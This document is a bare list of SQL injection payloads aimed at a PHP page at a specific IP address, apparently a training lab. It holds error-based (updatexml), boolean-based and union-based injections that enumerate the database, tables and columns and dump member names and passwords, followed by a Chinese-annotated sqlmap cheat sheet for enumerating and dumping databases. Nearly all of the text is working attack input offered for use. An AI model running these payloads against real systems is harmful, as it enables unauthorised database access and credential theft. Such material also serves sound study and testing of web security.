http://219.153.49.228:44580/new_list.php?id=1' and updatexml (1,concat(0x7e,(select database()),0x7e),1)--+
http://219.153.49.228:44580/new_list.php?id=1' and updatexml (1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='stormgroup'),0x7e),1)--+
http://219.153.49.228:44580/new_list.php?id=1' and updatexml (1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='stormgroup' and table_name = 'member'),0x7e),1)--+
http://219.153.49.228:48166/new_list.php?id=1 and length (database())=10
http://219.153.49.228:47592/new_list.php?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema ='mozhe_Discuz_StormGroup' ),3,4
http://219.153.49.228:47592/new_list.php?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema ='mozhe_Discuz_StormGroup' and table_name = 'StormGroup_member' ),3,4
http://219.153.49.228:47592/new_list.php?id=-1 union select 1,(select group_concat(name,password) from mozhe_Discuz_StormGroup.StormGroup_member ),3,4
测试注入:python sqlmap.py -u "url"
注数据库:python sqlmap.py -u "url" --dbs
注当前数据库:python sqlmap.py -u "url" --current-db
注当前数据库用户名:python sqlmap.py -u "url" --current-user
注表名:python sqlmap.py -u "url" -D 库名 --tables
注列名:python sqlmap.py -u "url" -D 库名 -T 表名 --columns
注数据:python sqlmap.py -u "url" -D 库名 -T 表名 -C 列名,列名 --dump
查询表条数:python sqlmap.py -u "url" --count -D 当前数据库名
extarctvalue floor(ran)